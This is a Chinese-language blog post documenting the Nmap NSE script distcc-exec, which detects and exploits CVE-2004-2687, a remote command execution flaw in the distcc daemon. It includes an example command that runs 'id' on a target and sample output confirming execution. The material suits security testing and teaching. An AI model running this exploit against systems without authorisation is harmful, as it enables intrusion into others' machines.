top of page
作家相片Samuel

Nmap NSE Category vulns Script:distcc-cve2004-2687 利用分散式編譯器守護程序 distcc 執行漏洞偵測

已更新:8月26日


Nmap Script指令摘要


這個指令用於檢測和利用分散式編譯器守護程序 distcc 中的一個遠端代碼執行漏洞偵測,遠端代碼執行漏洞偵測表示攻擊者可以透過遠端的方式,在目標系統上執行任意的程式碼,這可能對目標系統造成嚴重的安全風險;該漏洞於2002年被揭露,但由於服務的配置不當,現在中仍然存在這個漏洞。


Nmap Script指令參數

cmd

在遠端伺服器上執行命令的參數,您可以將特定的命令提供給此參數,指令將嘗試在目標伺服器上執行該命令。

vulns.short, vulns.showall

請查閱 vulns 函式庫的文件。


Nmap Script指令範例

nmap -p 3632 <ip> --script distcc-exec   --script-args="distcc-exec.cmd='id'"

Nmap Script指令輸出

PORT      STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|    VULNERABLE:
|    distcc Daemon Command Execution
|      State: VULNERABLE (Exploitable)
|      IDs:  CVE:CVE-2004-2687
|      Risk factor: High  CVSSv2: 9.3   (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|      Description:
|        Allows executing of arbitrary commands on systems running distccd 3.1   and
|        earlier. The vulnerability is the consequence of weak service   configuration.
|
|      Disclosure date: 2002-02-01
|      Extra information:
|
|      uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
|      References:
|        https://distcc.github.io/security.html
|        https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Nmap Script作者:

Patrik Karlsson

License: Same as Nmap--See https://nmap.org/book/man-legal.html



Nmap
Nmap

 

延伸閱讀

2 次查看

最新文章

查看全部

Comments


bottom of page